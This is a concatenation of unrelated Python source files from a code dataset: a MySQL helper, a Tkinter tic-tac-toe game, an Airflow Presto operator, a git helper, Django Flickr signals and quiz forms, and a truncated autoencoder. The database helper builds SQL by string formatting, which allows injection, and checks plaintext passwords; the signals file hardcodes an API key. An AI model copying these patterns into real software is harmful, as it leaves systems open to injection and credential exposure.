self.mycursor.execute(sql,val)\n self.mydb.commit()\n self.mycursor.close()\n return True\n except Exception:\n print(\"insert failed\")\n return False\n\n def checkLoginValidity(self,id,pswd):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql, (id,id))\n login_details=self.mycursor.fetchall()\n if(login_details):\n if(pswd==login_details[0][-1]):\n return login_details[0][-3],login_details[0][-4],login_details[0][0]\n return \"invalid\",\"\",\"\"\n\n def checkEmailValidity(self,email):\n sql = \"SELECT * FROM `smartward`.`ward_registration` WHERE Email=%s\"\n self.mycursor.execute(sql, (email,))\n return self.mycursor.fetchall()\n\n def updateIP(self,id,ip):\n try:\n sql=\"UPDATE `smartward`.`ward_registration` SET IP_Address=%s WHERE ID=%s OR Email=%s\"\n self.mycursor.execute(sql,(ip,id,id))\n self.mydb.commit()\n self.mycursor.close()\n except Exception:\n print(\"Ip update unsucessful\")\n\n def createDatabase(self):\n self.mycursor.execute(\"CREATE DATABASE 3hu4\")\n self.mydb.commit()\n self.mycursor.close()\n\nclass database_wardwindow(database):\n def __init__(self,hostname,user,dbase=database_name,pword=\"\"):\n super().__init__(hostname, user, dbase, pword)\n self.mycursor = self.mydb.cursor()\n try:\n self.mycursor.execute(\"CREATE DATABASE {0}\".format(dbase))\n self.mydb.commit()\n except Exception:\n pass\n self.mycursor.execute(\"USE {0}\".format(dbase))\n self.mydb.commit()\n\n\n def createFormTable(self,tablename):\n try:\n sql=\"CREATE TABLE {0} (RegDate VARCHAR(10) NOT NULL,RegNo VARCHAR(15) NOT NULL, PRIMARY KEY(RegNo)) ENGINE=InnoDB\".format(tablename)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception as e:\n print(e)\n return\n\n def addColumns(self,tablename,*columns):\n try:\n for column in columns:\n sql=\"ALTER TABLE {0} ADD COLUMN {1} VARCHAR(1600)\".format(tablename,column)\n self.mycursor.execute(sql)\n self.mydb.commit()\n except Exception:\n return\n\n def insertValues(self,tablename,columnandvaluselist):\n csv=columnandvaluselist\n print(csv)\n sql=\"INSERT INTO {0} ({1},{2}) VALUES ('{3}','{4}')\".format(tablename,csv[0],csv[2],csv[1],csv[3])\n self.mycursor.execute(sql)\n self.mydb.commit()\n for i in range(4,len(csv),2):\n sql=\"UPDATE {0} SET {1}='{2}' WHERE {3}='{4}'\".format(tablename,csv[i],csv[i+1],csv[0],csv[1])\n self.mycursor.execute(sql)\n self.mydb.commit()\n print(\"Ok\")\n\n def getRowCount(self,column,tablename,value):\n sql = \"SELECT {0} FROM {1} WHERE {0} LIKE '{2}'\".format(column,tablename,value)\n self.mycursor.execute(sql)\n rows=self.mycursor.fetchall()\n if(rows):\n return len(rows)\n return 0\n#a=database_wardwindow(\"localhost\",\"root\",\"3zxc3\")\n#a.createFormTable(\"gshs\")\n#a.addColumns(\"gshs\",\"Ajh\",\"sdkjjhv\",\"hjgd\")\n#print(a.getRowCount('RegDate','marriageregistration',\"2076/01/%\"))\n\n","sub_path":"Smartward/forms/sifaris/dbconnect.py","file_name":"dbconnect.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"454466255","text":"import tkinter as tk\nimport Functions4 as fn\n\nclass Main(tk.Frame):\n\n\tN = 3\n\tPlayer = \"x\"\n\tIndent = 3\n\tHeader = None\n\tPCFirst = True\n\tGameOver = False\n\tGameField = []\n\tButtons = []\n\tActive = False\n\tInMenu = True\n\n\tBackgroundColor = \"#3c3b3d\"\n\tSeparatorColor = \"#252526\"\n\n\tX = \"×\"\n\tO = \"○\"\n\n\tdef __init__(self, 
root):\n\t\tsuper().__init__(root)\n\t\tself.menu()\n\n\n\tdef computer_turn(self):\n\t\troot.update()\n\t\tif not self.GameOver:\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tif self.PCFirst:\n\t\t\t\tplayerFirst = False\n\t\t\telse:\n\t\t\t\tplayerFirst = True\n\t\t\tif self.Player == \"x\":\n\t\t\t\tActualPlayer = \"X\"\n\t\t\telse:\n\t\t\t\tActualPlayer = \"O\"\n\t\t\txy = fn.JarvisManager(self.GameField, ActualPlayer)\n\t\t\tprint(xy, self.Player)\n\t\t\ti = xy[0]\n\t\t\tj = xy[1]\n\t\t\tif self.Player == \"x\":\n\t\t\t\tself.Buttons[i][j].configure(text=self.X)\n\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\telse:\n\t\t\t\tself.Buttons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\tself.Header.configure(text=\"Your Turn\")\n\n\n\n\n\tdef def_win(self, Buttons):\n\t\tif not self.GameOver:\n\t\t\twinner = fn.CheckForWin(Buttons, self.N)\n\t\t\tif winner == 1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\t\telif winner == -1:\n\t\t\t\tif self.PCFirst:\n\t\t\t\t\tself.Header.configure(text=\"You Win!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\telse:\n\t\t\t\t\tself.Header.configure(text=\"PC Wins!\")\n\t\t\t\t\tself.restart_game()\n\t\t\t\tself.GameOver = True\n\t\tif fn.Is_full(self.GameField) and not self.GameOver:\n\t\t\tself.GameOver = True\n\t\t\tself.Header.configure(text=\"Dead Heat(\")\n\t\t\tself.restart_game()\n\t\t\treturn\n\n\n\n\tdef set_letter(self, Buttons, i, j):\n\t\tif not self.GameOver:\n\t\t\tif Buttons[i][j].cget(\"text\") == \" \" and self.Active:\n\t\t\t\tif self.Player == \"x\":\n\t\t\t\t\tButtons[i][j].configure(text=self.X)\n\t\t\t\t\tself.GameField[i][j] = \"X\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\t\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\telif self.Player == \"o\":\n\t\t\t\t\tButtons[i][j].configure(text=self.O, anchor=tk.S)\n\t\t\t\t\tself.GameField[i][j] = \"O\"\n\t\t\t\t\tself.def_win(Buttons)\n\t\t\t\t\tself.Player = \"x\"\n\t\t\t\t\tself.Active = False\n\t\t\t\t\tself.computer_turn()\n\t\t\t\t\tself.Active = True\n\t\t\t\t\tself.Player = \"o\"\n\t\t\t\t\t\n\t\t\tself.def_win(Buttons)\n\n\n\tdef restart_game(self):\n\t\tself.Active = False\n\t\tRestartButton = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Restart\")\n\t\tRestartButton.place(x=75, y=250, width=200, height=50)\n\t\tdef Clear(event):\n\t\t\tif not self.InMenu:\n\t\t\t\tN = self.N\n\t\t\t\tt = 1\n\t\t\t\tfor i in range(N):\n\t\t\t\t\tfor j in range(N):\n\t\t\t\t\t\tself.GameField[i][j] = t\n\t\t\t\t\t\tself.Buttons[i][j].destroy()\n\t\t\t\tself.Player = \"x\"\n\t\t\t\tself.Header = None\n\t\t\t\tself.PCFirst = True\n\t\t\t\tself.GameOver = False\n\t\t\t\tself.GameField = []\n\t\t\t\tself.Buttons = []\n\t\t\t\tself.Active = False\n\t\t\t\tself.MainField.destroy()\n\t\t\t\tRestartButton.configure(bg=self.BackgroundColor, fg=self.BackgroundColor)\n\t\t\t\tself.InMenu = True\n\t\t\t\tself.menu()\n\t\t\t\n\t\tRestartButton.bind(\"<Button-1>\", Clear)\n\n\n\tdef menu(self):\n\t\tself.Header = tk.Label(root, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 30), text=\"Who is first?\")\n\t\tself.Header.place(x=0, y=0, width=350, height=120)\n\t\tCompF = tk.Label(root, 
fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Computer\")\n\t\tUsrF = tk.Label(root, fg=\"#464547\", bg=self.SeparatorColor, font=(\"TkDefaultFont\", 20), text=\"Player\")\n\t\tCompF.place(x=75, y=180, width=200, height=50)\n\t\tUsrF.place(x=75, y=270, width=200, height=50)\n\t\tdef setC(event):\n\t\t\tself.PCFirst = True\n\t\t\tself.Active = False\n\t\t\tself.init_main()\n\t\tdef setU(event):\n\t\t\tself.PCFirst = False\n\t\t\tself.Active = True\n\t\t\tself.init_main()\n\t\tCompF.bind(\"<Button-1>\", setC)\n\t\tUsrF.bind(\"<Button-1>\", setU)\n\n\n\tdef init_main(self):\n\t\tself.InMenu = False\n\t\tN = self.N\n\t\tIndent = self.Indent\n\t\tButtonSize = int((330-Indent*(N-1))/N)\n\t\tself.Header.configure(font=(\"TkDefaultFont\", 40), text=\"Your Turn\")\n\n\t\tself.MainField = tk.Frame(bg=self.SeparatorColor)\n\t\tself.MainField.place(x=10, y=110, width=330, height=330)\n\n\t\tfor i in range(N):\n\t\t\tself.Buttons.append([])\n\t\t\tself.GameField.append([])\n\t\tt = 1\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tself.GameField[i].append(t)\n\t\t\t\ttemp = tk.Label(self.MainField, bg=self.BackgroundColor, fg=self.SeparatorColor, font=(\"TkDefaultFont\", 76), text=\" \")\n\t\t\t\tself.Buttons[i].append(temp)\n\t\t\t\tX = ButtonSize*i + Indent*i\n\t\t\t\tY = ButtonSize*j + Indent*j\n\t\t\t\tself.Buttons[i][j].place(x=X, y=Y, width=ButtonSize, height=ButtonSize)\n\t\t\t\t#Buttons[i].bind(\"<Button-1>\", lambda x: self.set_letter(Buttons, i))\n\t\t\t\tt += 1\n\n\t\tself.Buttons[0][0].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 0, 0))\n\t\tself.Buttons[0][1].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 0, 1))\n\t\tself.Buttons[0][2].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 0, 2))\n\t\tself.Buttons[1][0].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 1, 0))\n\t\tself.Buttons[1][1].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 1, 1))\n\t\tself.Buttons[1][2].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 1, 2))\n\t\tself.Buttons[2][0].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 2, 0))\n\t\tself.Buttons[2][1].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 2, 1))\n\t\tself.Buttons[2][2].bind(\"<Button-1>\", lambda x: self.set_letter(self.Buttons, 2, 2))\n\n\t\tif self.PCFirst:\n\t\t\t#self.Player = \"o\"\n\t\t\tself.Header.configure(text=\"Thinking...\")\n\t\t\tself.computer_turn()\n\t\t\tself.Active = True\n\t\t\tself.Player = \"o\"\n\n\n\t\n\t\t\n\n\n\n\n\t\t\n\n\nroot = tk.Tk()\napp = Main(root)\napp.pack()\nroot.title(\"Tic Tac Toe\")\nroot.geometry(\"350x450+500+500\")\nroot.configure(background=app.BackgroundColor)\n\n\n\nroot.mainloop()","sub_path":"Python/Tkinter/TickTackToe/Game4.py","file_name":"Game4.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"56821128","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nfrom airflow.providers.google.cloud.transfers.sql_to_gcs import BaseSQLToGCSOperator\nfrom airflow.providers.presto.hooks.presto import PrestoHook\n\nif TYPE_CHECKING:\n    from prestodb.client import PrestoResult\n    from prestodb.dbapi import Cursor as PrestoCursor\n\n\nclass _PrestoToGCSPrestoCursorAdapter:\n    \"\"\"\n    An adapter that adds additional features to the Presto cursor.\n\n    The implementation of cursor in the prestodb library is not sufficient.\n    The following changes have been made:\n\n    * The poke mechanism for row. You can look at the next row without consuming it.\n    * The description attribute is available before reading the first row. Thanks to the poke mechanism.\n    * The iterator interface has been implemented.\n\n    A detailed description of the class methods is available in\n    `PEP-249 <https://peps.python.org/pep-0249/>`__.\n    \"\"\"\n\n    def __init__(self, cursor: PrestoCursor):\n        self.cursor: PrestoCursor = cursor\n        self.rows: list[Any] = []\n        self.initialized: bool = False\n\n    @property\n    def description(self) -> list[tuple]:\n        \"\"\"\n        This read-only attribute is a sequence of 7-item sequences.\n\n        Each of these sequences contains information describing one result column:\n\n        * ``name``\n        * ``type_code``\n        * ``display_size``\n        * ``internal_size``\n        * ``precision``\n        * ``scale``\n        * ``null_ok``\n\n        The first two items (``name`` and ``type_code``) are mandatory, the other\n        five are optional and are set to None if no meaningful values can be provided.\n        \"\"\"\n        if not self.initialized:\n            # Peek for first row to load description.\n            self.peekone()\n        return self.cursor.description\n\n    @property\n    def rowcount(self) -> int:\n        \"\"\"The read-only attribute specifies the number of rows.\"\"\"\n        return self.cursor.rowcount\n\n    def close(self) -> None:\n        \"\"\"Close the cursor now.\"\"\"\n        self.cursor.close()\n\n    def execute(self, *args, **kwargs) -> PrestoResult:\n        \"\"\"Prepare and execute a database operation (query or command).\"\"\"\n        self.initialized = False\n        self.rows = []\n        return self.cursor.execute(*args, **kwargs)\n\n    def executemany(self, *args, **kwargs):\n        \"\"\"\n        Prepare and execute a database operation.\n\n        Prepare a database operation (query or command) and then execute it against\n        all parameter sequences or mappings found in the sequence seq_of_parameters.\n        \"\"\"\n        self.initialized = False\n        self.rows = []\n        return self.cursor.executemany(*args, **kwargs)\n\n    def peekone(self) -> Any:\n        \"\"\"Return the next row without consuming it.\"\"\"\n        self.initialized = True\n        element = self.cursor.fetchone()\n        self.rows.insert(0, element)\n        return element\n\n    def fetchone(self) -> Any:\n        \"\"\"Fetch the next row of a query result set, returning a single sequence, or ``None``.\"\"\"\n        if self.rows:\n            return self.rows.pop(0)\n        return self.cursor.fetchone()\n\n    def fetchmany(self, size=None) -> list:\n        \"\"\"\n        Fetch the next set of rows of a query result, returning a sequence of sequences.\n\n        An empty sequence is returned when no more rows are available.\n        \"\"\"\n        if size is None:\n            size = self.cursor.arraysize\n\n        
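# drain rows through fetchone() so anything buffered by peekone() is returned before hitting the live cursor\n        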
result = []\n for _ in range(size):\n row = self.fetchone()\n if row is None:\n break\n result.append(row)\n\n return result\n\n def __next__(self) -> Any:\n \"\"\"\n Return the next row from the current SQL statement using the same semantics as ``.fetchone()``.\n\n A ``StopIteration`` exception is raised when the result set is exhausted.\n \"\"\"\n result = self.fetchone()\n if result is None:\n raise StopIteration()\n return result\n\n def __iter__(self) -> _PrestoToGCSPrestoCursorAdapter:\n \"\"\"Return self to make cursors compatible to the iteration protocol.\"\"\"\n return self\n\n\nclass PrestoToGCSOperator(BaseSQLToGCSOperator):\n \"\"\"Copy data from PrestoDB to Google Cloud Storage in JSON, CSV or Parquet format.\n\n :param presto_conn_id: Reference to a specific Presto hook.\n \"\"\"\n\n ui_color = \"#a0e08c\"\n\n type_map = {\n \"BOOLEAN\": \"BOOL\",\n \"TINYINT\": \"INT64\",\n \"SMALLINT\": \"INT64\",\n \"INTEGER\": \"INT64\",\n \"BIGINT\": \"INT64\",\n \"REAL\": \"FLOAT64\",\n \"DOUBLE\": \"FLOAT64\",\n \"DECIMAL\": \"NUMERIC\",\n \"VARCHAR\": \"STRING\",\n \"CHAR\": \"STRING\",\n \"VARBINARY\": \"BYTES\",\n \"JSON\": \"STRING\",\n \"DATE\": \"DATE\",\n \"TIME\": \"TIME\",\n # BigQuery don't time with timezone native.\n \"TIME WITH TIME ZONE\": \"STRING\",\n \"TIMESTAMP\": \"TIMESTAMP\",\n # BigQuery supports a narrow range of time zones during import.\n # You should use TIMESTAMP function, if you want have TIMESTAMP type\n \"TIMESTAMP WITH TIME ZONE\": \"STRING\",\n \"IPADDRESS\": \"STRING\",\n \"UUID\": \"STRING\",\n }\n\n def __init__(self, *, presto_conn_id: str = \"presto_default\", **kwargs):\n super().__init__(**kwargs)\n self.presto_conn_id = presto_conn_id\n\n def query(self):\n \"\"\"Queries presto and returns a cursor to the results.\"\"\"\n presto = PrestoHook(presto_conn_id=self.presto_conn_id)\n conn = presto.get_conn()\n cursor = conn.cursor()\n self.log.info(\"Executing: %s\", self.sql)\n cursor.execute(self.sql)\n return _PrestoToGCSPrestoCursorAdapter(cursor)\n\n def field_to_bigquery(self, field) -> dict[str, str]:\n \"\"\"Convert presto field type to BigQuery field type.\"\"\"\n clear_field_type = field[1].upper()\n # remove type argument e.g. DECIMAL(2, 10) => DECIMAL\n clear_field_type, _, _ = clear_field_type.partition(\"(\")\n new_field_type = self.type_map.get(clear_field_type, \"STRING\")\n\n return {\"name\": field[0], \"type\": new_field_type}\n\n def convert_type(self, value, schema_type, **kwargs):\n \"\"\"\n Do nothing. 
Presto uses JSON on the transport layer, so types are simple.\n\n :param value: Presto column value\n :param schema_type: BigQuery data type\n \"\"\"\n return value\n","sub_path":"airflow/providers/google/cloud/transfers/presto_to_gcs.py","file_name":"presto_to_gcs.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"498890623","text":"\n# Copyright Jamie Allsop 2014-2015\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt)\n\n#-------------------------------------------------------------------------------\n# Git Source Control Management System\n#-------------------------------------------------------------------------------\n\nimport subprocess\nimport shlex\nimport os\nfrom exceptions import Exception\n\n\nclass GitException(Exception):\n def __init__(self, value):\n self.parameter = value\n def __str__(self):\n return repr(self.parameter)\n\n\ndef info( path ):\n if not path:\n raise GitException(\"No working copy path specified for calling git commands with.\")\n\n url = None\n repository = None\n branch = None\n revision = None\n\n if not os.path.exists( os.path.join( path, \".git\" ) ):\n raise GitException(\"Not a Git working copy\")\n\n try:\n command = \"git describe --always\"\n revision = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n\n command = \"git symbolic-ref HEAD\"\n branch = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path )\n branch = branch.replace( \"refs/heads/\", \"\" ).strip()\n\n command = \"git config --get remote.origin.url\"\n repository = subprocess.check_output( shlex.split( command ), stderr=subprocess.STDOUT, cwd=path ).strip()\n url = repository\n\n except subprocess.CalledProcessError:\n raise GitException(\"Not a Git working copy\")\n\n return url, repository, branch, revision\n\n","sub_path":"cuppa/scms/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"185581054","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom .models import Picture, Make, Lens, Camera\nimport requests\n\nFLICKR_API_URL = 'https://api.flickr.com/services/rest/'\nFLICKR_DISPLAY_PHOTO_URL = 'https://farm{}.staticflickr.com/{}/{}_{}_k.jpg'\n\ndef get_exif_data(picture_id):\n data = {}\n params = {\n 'format': 'json',\n 'nojsoncallback': 1,\n 'photo_id': picture_id,\n 'api_key': 'f665c808bb573b05caf029298373ec9e'\n }\n\n # EXIF\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getExif'}}).json()\n response = response['photo']['exif']\n tags = ['ISO', 'FocalLengthIn35mmFormat', 'FNumber', 'ExposureTime', 'Make', 'Lens', 'Model']\n for tag in tags:\n try:\n data[tag] = [x for x in response if x['tag'] == tag][0]['raw']['_content']\n except:\n data[tag] = None\n # Photo data\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getInfo'}}).json()\n\n response = response['photo']\n data['name'] = response['title']['_content']\n data['url'] = response['urls']['url'][0]['_content']\n # Display sizes\n response = requests.get(FLICKR_API_URL,\n params={**params,**{'method': 'flickr.photos.getSizes'}}).json()\n data['display-url'] = response['sizes']['size'][-2]['source']\n 
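# getSizes appears to list renditions from smallest to largest, so [-2] picks the second-largest available size\n    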
return data\n\n\ndef update_picture_exif(picture):\n    data = get_exif_data(picture.flickr_id)\n    picture.display_url = data['display-url']\n    if False:\n        picture.url = data['url']\n    picture.aperture = float(data['FNumber']) if data['FNumber'] is not None else None\n    picture.focal_length = int(float(data['FocalLengthIn35mmFormat'].split(' ')[0])) if data['FocalLengthIn35mmFormat'] is not None else None\n    picture.shutter_speed = data['ExposureTime']\n    picture.iso = int(data['ISO']) if data['ISO'] is not None else None\n    picture.name = data['name']\n\n    if data['Make'] is not None:\n        make = data['Make'].lower()\n        make = make[0].upper()+make[1:]\n        make_already_exist = Make.objects.filter(name=make).exists()\n        if not make_already_exist:\n            Make.objects.create(name=make)\n        make = Make.objects.filter(name=make).first()\n\n    if data['Lens'] is not None and picture.lens is None:\n        if not Lens.objects.filter(model=data['Lens'], make=make).exists():\n            lens = Lens.objects.create(model=data['Lens'], make=make)\n        else:\n            lens = Lens.objects.filter(model=data['Lens'], make=make).first()\n        picture.lens = lens\n\n    if data['Model'] is not None and picture.camera is None:\n        if not Camera.objects.filter(model=data['Model'], make=make).exists():\n            camera = Camera.objects.create(model=data['Model'], make=make)\n        else:\n            camera = Camera.objects.filter(model=data['Model'], make=make).first()\n        picture.camera = camera\n\n    post_save.disconnect(save_picture, sender=Picture)\n    picture.save()\n    post_save.connect(save_picture, sender=Picture)\n\n\n@receiver(post_save, sender=Picture)\ndef create_picture(sender, instance, created, **kwargs):\n    if created:\n        update_picture_exif(instance)\n\n\n@receiver(post_save, sender=Picture)\ndef save_picture(sender, instance, **kwargs):\n    #update_picture_exif(instance)\n    pass\n\n\ndef init_signals():\n    pass\n","sub_path":"gallery/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"649378598","text":"count = 1\r\nnum = 1\r\nprime = 0\r\nwhile count < 10001:\r\n\tnum = num + 2\r\n\tp = True\r\n\tfor i in range(3, int(num ** 0.5) + 1, 2):\r\n\t\tif num % i == 0:\r\n\t\t\tp = False\r\n\t\t\tbreak\r\n\tif p:\r\n\t\tprime = num\r\n\t\tcount = count + 1\r\nprint(prime)\r\n","sub_path":"10001st prime.py","file_name":"10001st prime.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"460137075","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\nfrom django.forms.widgets import RadioSelect\n\nfrom .models import MCQQuestion, Answer, Quiz\n\n\nclass QuestionForm(forms.Form):\n    def __init__(self, question, *args, **kwargs):\n        super(QuestionForm, self).__init__(*args, **kwargs)\n        choice_list = [x for x in question.get_answers_list()]\n        self.fields[\"answers\"] = forms.ChoiceField(choices=choice_list, widget=RadioSelect)\n\n\nMCQFormSet = inlineformset_factory(MCQQuestion,\n                                   Answer,\n                                   fields=['content',\n                                           'correct'],\n                                   extra=4,\n                                   can_delete=True,\n                                   )\n\n\nclass QuizCreateForm(forms.ModelForm):\n    class Meta:\n        model = Quiz\n        exclude = ['course', 'slug', 'random_order', 'answers_at_end']\n\n\nclass MCQCreateForm(forms.ModelForm):\n    class Meta:\n        model = MCQQuestion\n        exclude = ['course', 'quiz', 'answer_order']\n\n# class AnswerForm(forms.ModelForm):\n#     class Meta:\n#         model = Answer\n#         exclude = 
['question']\n#\n","sub_path":"aonebrains_quiz/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"141528946","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: VictorGueorguiev\n\"\"\"\n\n# code inspired by the following tutorial: \n#https://uvadlc-notebooks.readthedocs.io/en/latest/tutorial_notebooks/tutorial9/AE_CIFAR10.html#Building-the-autoencoder\n\n## Standard libraries\nimport os\nimport json\nimport math\nimport numpy as np\n\n## Imports for plotting\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import to_rgb\nimport matplotlib\nmatplotlib.rcParams['lines.linewidth'] = 2.0\nimport seaborn as sns\nsns.reset_orig()\nsns.set()\n\n## Progress bar\nfrom tqdm.notebook import tqdm\n\n## PyTorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as data\nimport torch.optim as optim\n# Torchvision\nimport torchvision\nfrom torchvision.datasets import CIFAR10\nfrom torchvision import transforms\n# PyTorch Lightning\nimport pytorch_lightning as pl\n\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\n\n# Tensorboard extension (for visualization purposes later)\nfrom torch.utils.tensorboard import SummaryWriter\n\nclass Encoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of input channels of the image. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the first convolutional layers. Deeper layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the encoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.net = nn.Sequential(\n nn.Conv2d(num_input_channels, c_hid, kernel_size=3, padding=1, stride=2), # 32x32 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 16x16 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1, stride=2), # 8x8 => 4x4\n act_fn(),\n nn.Flatten(), # Image grid to single feature vector\n nn.Linear(2*16*c_hid, latent_dim)\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass Decoder(nn.Module):\n\n def __init__(self,\n num_input_channels : int,\n base_channel_size : int,\n latent_dim : int,\n act_fn : object = nn.GELU):\n \"\"\"\n Inputs:\n - num_input_channels : Number of channels of the image to reconstruct. For CIFAR, this parameter is 3\n - base_channel_size : Number of channels we use in the last convolutional layers. 
Early layers might use a duplicate of it.\n - latent_dim : Dimensionality of latent representation z\n - act_fn : Activation function used throughout the decoder network\n \"\"\"\n super().__init__()\n c_hid = base_channel_size\n self.linear = nn.Sequential(\n nn.Linear(latent_dim, 2*16*c_hid),\n act_fn()\n )\n self.net = nn.Sequential(\n nn.ConvTranspose2d(2*c_hid, 2*c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 4x4 => 8x8\n act_fn(),\n nn.Conv2d(2*c_hid, 2*c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(2*c_hid, c_hid, kernel_size=3, output_padding=1, padding=1, stride=2), # 8x8 => 16x16\n act_fn(),\n nn.Conv2d(c_hid, c_hid, kernel_size=3, padding=1),\n act_fn(),\n nn.ConvTranspose2d(c_hid, num_input_channels, kernel_size=3, output_padding=1, padding=1, stride=2), # 16x16 => 32x32\n nn.Tanh() # The input images is scaled between -1 and 1, hence the output has to be bounded as well\n )\n\n def forward(self, x):\n x = self.linear(x)\n x = x.reshape(x.shape[0], -1, 4, 4)\n x = self.net(x)\n return x\n \nclass Autoencoder(pl.LightningModule):\n\n def __init__(self,\n base_channel_size: int,\n latent_dim: int,\n encoder_class : object = Encoder,\n decoder_class : object = Decoder,\n num_input_channels: int = 3,\n width: int = 32,\n height: int = 32):\n super().__init__()\n # Saving hyperparameters of autoencoder\n self.save_hyperparameters()\n # Creating encoder and decoder\n self.encoder = encoder_class(num_input_channels, base_channel_size, latent_dim)\n self.decoder = decoder_class(num_input_channels, base_channel_size, latent_dim)\n # Example input array needed for visualizing the graph of the network\n self.example_input_array = torch.zeros(2, num_input_channels, width, height)\n\n def forward(self, x):\n \"\"\"\n The forward function takes in an image and returns the reconstructed image\n \"\"\"\n z = self.encoder(x)\n x_hat = self.decoder(z)\n return x_hat\n\n def _get_reconstruction_loss(self, batch):\n \"\"\"\n Given a batch of images, this function returns the reconstruction loss (MSE in our case)\n \"\"\"\n x, _ = batch # We do not need the labels\n x_hat = self.forward(x)\n loss = F.mse_loss(x, x_hat, reduction=\"none\")\n loss = loss.sum(dim=[1,2,3]).mean(dim=[0])\n return loss\n\n def configure_optimizers(self):\n optimizer = optim.Adam(self.parameters(), lr=1e-3)\n # Using a scheduler is optional but can be helpful.\n # The scheduler reduces the LR if the validation performance hasn't improved for the last N epochs\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.2,\n patience=20,\n min_lr=5e-5)\n return {\"optimizer\": optimizer, \"lr_scheduler\": scheduler, \"monitor\": \"val_loss\"}\n\n def training_step(self, batch, batch_idx):\n loss = self._get_reconstruction_loss(batch)\n self.log('train_loss', loss)\n return loss\n\n def validation_step(self, batch, 